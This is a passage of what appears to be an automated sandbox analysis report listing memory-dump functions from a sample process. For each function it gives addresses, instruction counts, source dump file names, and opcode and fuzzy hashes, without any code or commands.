                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a32174715be1dc33cffbd862cc66ab259a661735f7761303834c88f25aed78c6
                                                          • Instruction ID: 71210c368e82549e88a60927e719e66d35ab24b925705b5b1823d9e68a6846b6
                                                          • Opcode Fuzzy Hash: a32174715be1dc33cffbd862cc66ab259a661735f7761303834c88f25aed78c6
                                                          • Instruction Fuzzy Hash: E6F0397480A258CFCBA1DF68C85479CBFB0EF09305F1085DAD449A7255CB384A86CF10
                                                          Function 0609C030 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c89b7ad1472885de2590dced7f6613974af35c8420c668eae2a9653a9c8c2bc0
                                                          • Instruction ID: 80414be93cf0afeeba431cb6c3f82b176d23e8ab0d866d6d99c620421f15a29e
                                                          • Opcode Fuzzy Hash: c89b7ad1472885de2590dced7f6613974af35c8420c668eae2a9653a9c8c2bc0
                                                          • Instruction Fuzzy Hash: 2AF03034A042588FDB54CF64C8407DDB7B2FF49704F008099D509A7284DBB59E85CF51
                                                          Function 07179F50 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386674114.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7160000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db9274114c72fde9ca913821e96c91ae53617aac279322619f2f7dc4d05816af
                                                          • Instruction ID: 05ee0c253c41d51e11a0da62639257b6a8dd17f60a5f9234881647067cebe9c1
                                                          • Opcode Fuzzy Hash: db9274114c72fde9ca913821e96c91ae53617aac279322619f2f7dc4d05816af
                                                          • Instruction Fuzzy Hash: 26E086B4909208EBC704DFA4D8409ACBF78EB46310F10C199DC0417341C732AE55DBC4
                                                          Function 07178A58 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386674114.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7160000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 045c41e6aca07780cae868e7ff35fcf4fc537b9972ee42a2b6b0cbdef5d3459c
                                                          • Instruction ID: 69f1507a29c04e571788c12c437d2764c846a4686980a7ec01b4264ae44012a2
                                                          • Opcode Fuzzy Hash: 045c41e6aca07780cae868e7ff35fcf4fc537b9972ee42a2b6b0cbdef5d3459c
                                                          • Instruction Fuzzy Hash: A7E04FB4D04108EFCB04DFA9D4445ACFBB8EB89310F10C1E9D84997381D7369A01DF80
                                                          Function 06D7F740 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b979a80636635b819c8b9a6fbec475fdf72f93f6d5b9bcd98b464473d68db0e
                                                          • Instruction ID: 63df177dda2d14ec4e5233b2c297f8018893fbe93d55385e4e51ba3667fe1024
                                                          • Opcode Fuzzy Hash: 3b979a80636635b819c8b9a6fbec475fdf72f93f6d5b9bcd98b464473d68db0e
                                                          • Instruction Fuzzy Hash: 95E04674D04208EFCB90EFA8C4416ACBBF8AB48310F2080E9C808D3341E6329A42CB81
                                                          Function 06D769CB Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a8a733a863e9ae94cd06c30d5bfe9436ba186b5c3cfe3615f2f3bc54a8766579
                                                          • Instruction ID: 3c653072114ee3f7d6c1dad1b63b9920f7da4aa734bba399906122162e9c20b9
                                                          • Opcode Fuzzy Hash: a8a733a863e9ae94cd06c30d5bfe9436ba186b5c3cfe3615f2f3bc54a8766579
                                                          • Instruction Fuzzy Hash: D5F0D434D00248DFDB94CF54E884B9DBBB1FB09310F0084A5E808A3251E7399888CF51
                                                          Function 0609E630 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5d9dc461dfb1d5fcdf75f219900f60de4c74d6b8cc159f62d0f5a68bf192938
                                                          • Instruction ID: 8675e2b9c0e7ee0cd03f7fa14985ec462e675c468bf9ade2d2aa502cd724903b
                                                          • Opcode Fuzzy Hash: f5d9dc461dfb1d5fcdf75f219900f60de4c74d6b8cc159f62d0f5a68bf192938
                                                          • Instruction Fuzzy Hash: 64E08C74908208EFCB44DFA4D8419ACBFBAEF89310F14C1A9DD0427391D632AE52EF94
                                                          Function 0609C7D0 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 990657173654f0c0b99909a95887deaacf84db9c814ccc1dfb260c90a7554241
                                                          • Instruction ID: 1a648537a9c7f77e71c63415c43626aa930b74bc72aa9bb6091ba12194674f19
                                                          • Opcode Fuzzy Hash: 990657173654f0c0b99909a95887deaacf84db9c814ccc1dfb260c90a7554241
                                                          • Instruction Fuzzy Hash: C5E04674D04208EFCB80EFA8C4406ACFBF9AB48210F2080E9C808D3351E7329A41DB90
                                                          Function 0609C4A0 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 990657173654f0c0b99909a95887deaacf84db9c814ccc1dfb260c90a7554241
                                                          • Instruction ID: 00fa856986e97fe4fe51539fb60d48a951c7ce0537f415615bda95bdfa9f509a
                                                          • Opcode Fuzzy Hash: 990657173654f0c0b99909a95887deaacf84db9c814ccc1dfb260c90a7554241
                                                          • Instruction Fuzzy Hash: 2EE04F74E44108DFDB80DFA8C4406ACBBF5AB48310F1080E9D808D3341D6329E41DF90
                                                          Function 060984F7 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6e6c971b75bed9546332688a6b789a00f7fc0b74915be0303772b60dcf31246d
                                                          • Instruction ID: 8c4779724eb426d9cef07f9f70208fb4e45ee90565d6e0436a4dbd9074e79787
                                                          • Opcode Fuzzy Hash: 6e6c971b75bed9546332688a6b789a00f7fc0b74915be0303772b60dcf31246d
                                                          • Instruction Fuzzy Hash: A2E0E534980608DFEF458F94D814BEEBBB7FB4A704F108408E9196B354C7398945EFA0
                                                          Function 060975E0 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 990657173654f0c0b99909a95887deaacf84db9c814ccc1dfb260c90a7554241
                                                          • Instruction ID: f9e95a12393b8bddae999c9a846e10b82d518fd58867daf892893fd981b18896
                                                          • Opcode Fuzzy Hash: 990657173654f0c0b99909a95887deaacf84db9c814ccc1dfb260c90a7554241
                                                          • Instruction Fuzzy Hash: F7E04670915208EFCBC0EFA8C9407ACBBF9AB48210F2080E9C808D3341E6729A81DB90
                                                          Function 0609F2C0 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ffb3a9477e584b025bf3bca7e0e03cc7cd820dff4658569c19e806d4ea8aedc
                                                          • Instruction ID: ebba4e96e97f9583a0bbdbe1891e187492f6695a0aa8a618243f41e5961ad9f0
                                                          • Opcode Fuzzy Hash: 1ffb3a9477e584b025bf3bca7e0e03cc7cd820dff4658569c19e806d4ea8aedc
                                                          • Instruction Fuzzy Hash: 89E01A74D04208EFCB44DF98D4406ACBBB9EB89310F10C1E9D80897341C6329E41DF80
                                                          Function 06099CFB Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a165ac2ba7f64c9f66c504107ce1516d851b04fed95965f2f777334217cd1bc
                                                          • Instruction ID: fb0bd28645dc103b4868a86be17507a24c61545519456e0a5a76144e97fa7b7a
                                                          • Opcode Fuzzy Hash: 5a165ac2ba7f64c9f66c504107ce1516d851b04fed95965f2f777334217cd1bc
                                                          • Instruction Fuzzy Hash: 76F0153584060EDBCF119F54C844ADEB772FF54308F108689E90937210DB35AAD99F80
                                                          Function 0609C970 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 990657173654f0c0b99909a95887deaacf84db9c814ccc1dfb260c90a7554241
                                                          • Instruction ID: 07d59776e8af94dc195b2fefb8a48e40bf41d15e65af4d7fd5e697633037a47c
                                                          • Opcode Fuzzy Hash: 990657173654f0c0b99909a95887deaacf84db9c814ccc1dfb260c90a7554241
                                                          • Instruction Fuzzy Hash: ABE04670D04208EFCB80EFB8C4446ACFBF9EB4A214F2080E9C808D3341E6329A41DB90
                                                          Function 0166FAD8 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6b481ddf926b9400c3e54675badfe4c83f479e4314f40c9fc42a2b61d253c41c
                                                          • Instruction ID: 9f558f7013716f051f07d2e03bbf442876c3f8bae0568635be15561515e170ff
                                                          • Opcode Fuzzy Hash: 6b481ddf926b9400c3e54675badfe4c83f479e4314f40c9fc42a2b61d253c41c
                                                          • Instruction Fuzzy Hash: 4BE01270D01208EFCB54DFA8E40469CBBB8EB88301F1081E9D808A3304E7369A40CF81
                                                          Function 0717DEC0 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386674114.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7160000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 31656f99f8e64542671e71096db9652e83790fdbfc5c9d4c771413c2a6d76f37
                                                          • Instruction ID: c48639927a65b356e8f312f28b6cad6634656aa02a85e4f639cd2af8a4591c70
                                                          • Opcode Fuzzy Hash: 31656f99f8e64542671e71096db9652e83790fdbfc5c9d4c771413c2a6d76f37
                                                          • Instruction Fuzzy Hash: 27E0C2B4A0820CDBC709DFA8E5405ACBBB8EF86310F10C1D8C80827381CF329E42CB80
                                                          Function 06D7DDA0 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5610c596b5b5538ab4560559fb30f530e9ea987832c915d4d4403a6e8eee054e
                                                          • Instruction ID: e3a222d7b903a15355190ae0b280d4a62fa6a1465a382d697613fea12bee810b
                                                          • Opcode Fuzzy Hash: 5610c596b5b5538ab4560559fb30f530e9ea987832c915d4d4403a6e8eee054e
                                                          • Instruction Fuzzy Hash: 12E0EC70D15208EFC780DFB8D4456DCBBB9AF49225F1041A9D90893340E6755A54CF95
                                                          Function 06097500 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d80cc4b0767faa3f1d1b316d9ce85613004264eb0bfd50a4f0c0e501d30aef7
                                                          • Instruction ID: 9fd8b5724383ad2e432d7b391f0df9e20250a6a90a6078dfe7953d884f026515
                                                          • Opcode Fuzzy Hash: 0d80cc4b0767faa3f1d1b316d9ce85613004264eb0bfd50a4f0c0e501d30aef7
                                                          • Instruction Fuzzy Hash: 7BE0C27188110CDFCB81FBB4C90068D7BFDDF4A341F4085E9C100D3120EA714A00EBA1
                                                          Function 06091538 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction ID: 0d5de0bcfc642141a48efabdd33aad8d40a595517d8fecd13cd84dd7eff40575
                                                          • Opcode Fuzzy Hash: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction Fuzzy Hash: D0E0C274A08108DFCB44DFA8D4405ACBFBAEB85310F10C1ECD80917341CA329E42EB90
                                                          Function 06096070 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction ID: 104546a045ddf36b05be3df28f941dee855e7a1f1ac70b933703ecfe1d9bc07e
                                                          • Opcode Fuzzy Hash: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction Fuzzy Hash: 7BE08C34908108DBCB44DFA4D4805ADBBB9AB85314F1081D9C80817341C6339E42DB90
                                                          Function 06092088 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction ID: 02c5078c27d89d4873176ed54e5e6e3eae2d5ef07274444b8ea9ebb5c8013011
                                                          • Opcode Fuzzy Hash: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction Fuzzy Hash: DBE08C74D18208EFCB44DFA4D5445ACBFB9AB89310F6081E8C80817342CA329E42DB90
                                                          Function 06096830 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction ID: 4819827addbcd9dac3696fa4172a067a78bf5e3ed36e126ff622e8daa05bcb89
                                                          • Opcode Fuzzy Hash: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction Fuzzy Hash: C9E0C274D18108EFCB48DFA4D4415ADBFB9EB86314F10C2D9C80817351CA739E42DB90
                                                          Function 060909D0 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction ID: 44710fcaa4cad01db6fd008ff06482f3238e4da2726fe3e4f983e45b3977d9f4
                                                          • Opcode Fuzzy Hash: 62ed285e522ef29c55b973842ad0e2e099a1410e034a71e8c39da56ef68784e6
                                                          • Instruction Fuzzy Hash: F2E0C234909108DFCB44DFA4D4416ACBFB9EB85310F10C1DCC80917341C632AE42DB90
                                                          Function 06D79921 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 00891338e1f80b119bc8dba997f91930467774af6f3dc21f5dbf9a5cc2d71568
                                                          • Instruction ID: 07d51cda678cb82e04945829e22ef796bd2ca731fb07348f587f46f56477772b
                                                          • Opcode Fuzzy Hash: 00891338e1f80b119bc8dba997f91930467774af6f3dc21f5dbf9a5cc2d71568
                                                          • Instruction Fuzzy Hash: D7F05FB4E016688FCBA0CF24DD84B9ABBF5BB89311F0040E9D549A3254EB315E80CF05
                                                          Function 06097320 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0cecc324e8ab20705e1f6ef264d3547854c85d30dbc8ea4bf04ac3e61db5494b
                                                          • Instruction ID: 584d3a4bd9076ec657d10c44909ce1470d3ac97a7801b94d8da98de0fd022a2f
                                                          • Opcode Fuzzy Hash: 0cecc324e8ab20705e1f6ef264d3547854c85d30dbc8ea4bf04ac3e61db5494b
                                                          • Instruction Fuzzy Hash: CFE08C30814108DFCB90DBA8C4412ACBFB89B49215F50C0D9DC4857341E6329A42DB90
                                                          Function 0609FA58 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd99da2609284f99d33f3c2893be1227209a8f7ed239945a5b2751e0a8a83ccd
                                                          • Instruction ID: 053346807e3146394aac1302df880a5400d6e4a9b9af4704049bbd334230b820
                                                          • Opcode Fuzzy Hash: cd99da2609284f99d33f3c2893be1227209a8f7ed239945a5b2751e0a8a83ccd
                                                          • Instruction Fuzzy Hash: C8E08C70D05108DFCB80DBA8C4406ACBBF8AB49310F1080D8C80897341E6329E41DB90
                                                          Function 0166F5C0 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8239e4c9b06a58683a527f00419d192108396b0002fa9bc8f06538c9007fb007
                                                          • Instruction ID: c5446528d8a2582a5bf206f6a0cf7acc31df54afc2bfa22ed51378eea5b6de52
                                                          • Opcode Fuzzy Hash: 8239e4c9b06a58683a527f00419d192108396b0002fa9bc8f06538c9007fb007
                                                          • Instruction Fuzzy Hash: B1E0E2B0911208EFCB54EFB8995429DBBB9AB44212F6041EDC908A6350EB329A90DF85
                                                          Function 06098732 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 69dc07e9fb6425ee32d487363da9f4b6c0ed955cc77f6360b784c2211f9c651d
                                                          • Instruction ID: 69db84c7bec887362321ced82fab044e55a00416da56ad3a758a664760cc24f6
                                                          • Opcode Fuzzy Hash: 69dc07e9fb6425ee32d487363da9f4b6c0ed955cc77f6360b784c2211f9c651d
                                                          • Instruction Fuzzy Hash: 8EE0C279D54208CFDF409F98C8AC6EC7FB3FB4D354F108804E50A67350CA3888028BA0
                                                          Function 06096D54 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0896bf1b4c0712ac0c2c54c35652c20fbdc7a55d771cdb601880f87e65af626f
                                                          • Instruction ID: 4fae999ab97f1696fede3f20737e1fbb05b94f924796eabbd6b1c8d731be57f2
                                                          • Opcode Fuzzy Hash: 0896bf1b4c0712ac0c2c54c35652c20fbdc7a55d771cdb601880f87e65af626f
                                                          • Instruction Fuzzy Hash: FAE0EC74D64248CFEF58DFA8E0406ACBBB2FB19304F10842AE525E7340D6359C04CF51
                                                          Function 016664E5 Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3490cf820fb023f117d785034f9e8b05a8bff6796a1689a539c3ceb4629963f2
                                                          • Instruction ID: 5d43107499260e15754e40ebc1f171d9de61327e9a1f1e981fefafdb42d62353
                                                          • Opcode Fuzzy Hash: 3490cf820fb023f117d785034f9e8b05a8bff6796a1689a539c3ceb4629963f2
                                                          • Instruction Fuzzy Hash: 52E0FE74905229CFCB68DF24D958698BBF5BB48305F80D5EA9889A3244DF711E84DF40
                                                          Function 07163B32 Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386674114.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7160000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5190dd1c09640c6c646980bb53789a1ffa31d8d61270d39340fc813c9bc606e3
                                                          • Instruction ID: 3a94f519782fb5bbc970c26667650c62bbb80f6701056a3398db9b3dbf4d0414
                                                          • Opcode Fuzzy Hash: 5190dd1c09640c6c646980bb53789a1ffa31d8d61270d39340fc813c9bc606e3
                                                          • Instruction Fuzzy Hash: 61D05B705041448FE7059F64C45CB767762EB4A309F25409CD51DA7681DB798946CF02
                                                          Function 06D7991C Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4283aeccacbd73fd4aad758886b1c5de0f94d42c8b535f207f3f40fd6a0b74de
                                                          • Instruction ID: a4243ce6dc2ea7f78963721c2d304ddb826697b35ec52b3d9b5a1d0c87f9c380
                                                          • Opcode Fuzzy Hash: 4283aeccacbd73fd4aad758886b1c5de0f94d42c8b535f207f3f40fd6a0b74de
                                                          • Instruction Fuzzy Hash: 41D01270511718CFEB949F28D884E697775AB44300F100656884577244EF388E858F41
                                                          Function 01663894 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
